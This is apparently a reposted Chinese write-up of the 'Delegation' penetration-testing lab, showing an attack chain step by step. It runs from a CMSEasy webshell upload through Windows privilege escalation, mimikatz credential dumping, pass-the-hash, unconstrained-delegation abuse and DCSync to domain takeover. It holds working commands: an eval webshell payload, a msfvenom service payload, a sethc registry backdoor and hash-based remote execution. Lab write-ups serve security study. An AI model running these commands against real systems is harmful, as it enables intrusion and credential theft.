春秋云镜 Delegation

news/2024/11/15 6:06:57/文章来源:https://www.cnblogs.com/meraklbz/p/18373310

现用fscan扫一下入口机
image
发现是cmseasy,在/admin路由处可以登录,弱密码admin123456
这里存在CVE漏洞,写个马进去
image

get:
/index.php?case=template&act=save&admin_dir=admin&site=default
post:
sid=#data_d_.._d_.._d_.._d_11.php&slen=693&scontent=<?php @eval($_POST[1]);?>
回显OK说明上传成功
image

蚁剑链接,反弹shell到vps
查看一下suid位

find / -user root -perm -4000 -print 2>/dev/null

结果如下

/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

使用diff提权

diff --line-format=%L /dev/null /home/flag/flag01.txt

image

flag:flag{d9a0b461-21df-4a64-9ad9-0e650adfd950}
配置nps代理,传个fscan扫内网

172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.45:445 open
172.22.4.19:445 open
172.22.4.7:445 open
172.22.4.45:139 open
172.22.4.19:139 open
172.22.4.45:135 open
172.22.4.7:139 open
172.22.4.7:135 open
172.22.4.19:135 open
[*] NetInfo:
[*]172.22.4.7[->]DC01[->]172.22.4.7
[*] 172.22.4.7  (Windows Server 2016 Datacenter 14393)
[*] NetInfo:
[*]172.22.4.45[->]WIN19[->]172.22.4.45
[*] NetInfo:
[*]172.22.4.19[->]FILESERVER[->]172.22.4.19
[*] NetBios: 172.22.4.45     XIAORANG\WIN19                 
[*] NetBios: 172.22.4.7      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] NetBios: 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.22.4.36        code:200 len:68069  title:中文网页标题
[*] WebTitle: http://172.22.4.45        code:200 len:703    title:IIS Windows Server

总感觉fscan扫的太慢了...
上面的flag提示要打win19去爆破密码

proxychains crackmapexec smb 172.22.4.45 -u Adrian -p rockyou.txt -d WIN19

得到密码

WIN19\Adrian
babygirl1

先用kali登一下去改密码

proxychains rdesktop 172.22.4.45

改完还是回到windows下去登(kali太慢了)
在其中找到了一个html文件,内容包含如下部分
image

意识是这个ModifiablePath是普通用户可写的.因此可以进行注册表提权
首先使用msf生成一个木马来执行我们的shift.bat

msfvenom -p windows/x64/exec cmd="C:\windows\system32\cmd.exe /c C:\Users\Adrian\Desktop\shift.bat" --platform windows -f exe-service > evil.exe

然后新建一个shift.bat如下

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"

依次执行如下命令

## 修改注册表
reg add "HKLM\SYSTEM\CurrentControlSet\Services\gupdate" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\Adrian\Desktop\evil.exe" /f
## 重启服务
sc start gupdate

锁定用户,连按5下shift,弹出shell
image

创建一个新的用户lbz,添加到管理员组,然后进行远程连接

net user lbz lbz041130 /add
net localgroup administrators lbz /add

拿到了第二个flag
flag:flag{c015ba18-f75e-4c0b-8b8e-5e82b9a48205}
上传mimikatz,去抓取本地哈希

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

image

得到了域用户win19$的NTLM
d776bd558e56bbc4f47eed38dc9e4d05
使用mimikatz进行哈希横传.

mimikatz "privilege::debug" "sekurlsa::pth /user:WIN19$ /domain:"xiaorang.lab" /ntlm:d776bd558e56bbc4f47eed38dc9e4d05" 

弹出了域用户的管理员终端
image

上传一个SharpHound去抓域信息

SharpHound.exe -c all

发现这个WIN19 和 DC01 都存在非约束性委托
image

上传Rubeus监听TGT

Rubeus.exe monitor /interval:1 /filteruser:DC01$

使用dfscoerce.py去诱导DC01向win19$发起请求

proxychains python3 dfscoerce.py -u "WIN19$" -hashes :d776bd558e56bbc4f47eed38dc9e4d05 -d xiaorang.lab win19 172.22.4.7

image

成功截获DC01的TGT
将得到的base64放入base64.txt中,使用如下命令解码

certutil -f -decode base64.txt DC.kirbi

此时有了Domain Admain权限,可以打一个DCsync

mimikatz.exe "kerberos::purge" "kerberos::ptt DC.kirbi" "lsadump::dcsync /domain:xiaorang.lab /all /csv" "exit"

image

得到了Administractor的NTLM哈希4889f6553239ace1f7c47fa2c619c252
哈希横传获得其他两个机器上的flag

proxychains crackmapexec smb 172.22.4.19 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

flag:flag{20e2ee96-53b2-4f36-b09e-f3d0744186f1}

proxychains crackmapexec smb 172.22.4.7 -u administrator -H4889f6553239ace1f7c47fa2c619c252 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"

flag:flag{57502dcf-63db-48b4-93e7-adafa2dd20aa}

共用时1小时24分,是目前最快的一次.这个靶场学到了很多东西,同时清晰了很多概念...会看bloodhound了.第一次进行非约束委派攻击.
image

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/785293.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

企业市值排名3D可视化,重塑商业版图新维度

在这个数据驱动的时代,每一个数字背后都蕴藏着无限的可能与机遇。企业市值,作为衡量企业综合实力与市场认可度的关键指标,其动态变化不仅是投资者关注的焦点,也是全球商业竞争格局的晴雨表。当枯燥的数据表格被转化为生动的3D场景,全球数千家企业的市值排名不再只是冷冰冰…

微信小程序echarts-饼状图

为了兼容小程序 Canvas,我们提供了一个小程序的组件,用这种方式可以方便地使用 ECharts。 首先,下载 GitHub 上的 ecomfe/echarts-for-weixin 项目。一、封装pieChart组件 pieChart.wxml:<view class="container"><ec-canvas id="mychart-dom-bar&…

【Python脚本】刚度矩阵格式转换

一个Python脚本,用来将一个刚度转换到不同的商业软件,进行二次开发对于1-2-3坐标系:应力矩阵如下: \[\left.[\sigma]=\left[\begin{array}{ccc}\sigma_{11}&\sigma_{12}&\sigma_{13}\\\sigma_{12}&\sigma_{22}&\sigma_{23}\\\sigma_{13}&\sigma_{23}&…

DP斜率优化学习笔记

最后一次修改:2024.7.16 14:39 P.M By 哈哈铭 简介 “斜率优化”顾名思义就是用斜率进行优化,让 \(DP\) 的时间复杂度更优。 一般情况下,将动态转移方程化简后得到这样的关系式: \[\frac{y_1-y_2}{x_1-x_2} \leq K \]然后通过该式进行转移,以达到优化时间复杂度的目的。 小…

LLM 推理 服务

目录vLLMPagedAttention:解决内存瓶颈vLLM 的安装与使用 vLLM 加州大学伯克利分校的研究者开源了一个项目 vLLM,该项目主要用于快速 LLM 推理和服务。 vLLM 的核心是 PagedAttention,这是一种新颖的注意力算法,它将在操作系统的虚拟内存中分页的经典思想引入到 LLM 服务中。…

批量图像识别的快速遍历技巧

本周我们来介绍一下如何快速地批量遍历图片列表找到图片对应的位置或对应关系,也很感谢Q群2群lincoln同学的分享,感兴趣的同学可以戳推文详细阅读~此文章来源于项目官方公众号:“AirtestProject” 版权声明:允许转载,但转载必须保留原链接;请勿用作商业或者非法用途一、前…

系统缓存可以删吗,删除系统缓存的方法有哪些

系统缓存是可以清理的,这些文件在长时间积累后可能会占用大量的磁盘空间,甚至影响电脑的性能。以下是一些清理C盘缓存的方法: 一、清理系统缓存 1.使用磁盘清理工具: 打开“此电脑”,右键点击C盘,选择“属性”。在“常规”选项卡中,点击“磁盘清理”。 系统将扫描C盘上的…

关于电脑晚上自动关机的问题,系统win11

前提:由于工作需要,有时需电脑在晚上仍能保持运行,但目前突然出现电脑晚上自动关机的情况,故需寻找解决方法。 解决方案:原文地址 方法:本次主要采取原文中所提及的方法二。 step1:搜索设备管理器step2:找到系统设备step3:在系统设备中找到Intel(R) Management Engine…

Vue 之混入(mixin)详细介绍

混入(mixin)提供了一种非常灵活的方式,来分发 Vue 组件中的可复用功能。一个混入对象可以包含任意组件选项(如data、methods、mounted、filters等等)。 一、注册使用 1、在main.js中全局配置import mixin from ./mixinsVue.mixin(mixin)2、组件中配置 在日常的开发中,我…

Goby 漏洞发布|泛微 e-cology v10 appThirdLogin 权限绕过漏洞【漏洞复现】

漏洞名称:泛微 e-cology v10 appThirdLogin 权限绕过漏洞 English Name:Weaver e-cology v10 appThirdLogin Permission Bypass Vulnerability CVSS core: 7.5 漏洞描述: 泛微新一代数字化运营构建平台E10,是基于原eteams平台之上全新研发,同时融合了原E9产品的所有功能,…

[VS Code扩展]写一个代码片段管理插件(二):功能实现

@目录创建和插入代码片段代码片段列表代码片段预览代码片段编辑自定义映射默认映射自动完成项目地址 创建和插入代码片段 VS Code扩展提供了数据存储,其中globalState是使用全局存储的Key-Value方式来保存用户状态,支持在不同计算机上保留某些用户状态,详情请参考官方文档 若…

DLAFormer:微软提出多任务统一的端到端文本分析Transformer模型 | ICDAR 2024

论文提出新颖的基于Transformer的端到端方法DLAFormer,在统一的模型中集成多个文档布局分析任务,包括图形页面对象检测、文本区域检测、逻辑角色分类和阅读顺序预测。为了实现这一目标,将各种DLA子任务视为关系预测问题并提出了统一标签空间方法,使得统一关系预测模块能够有…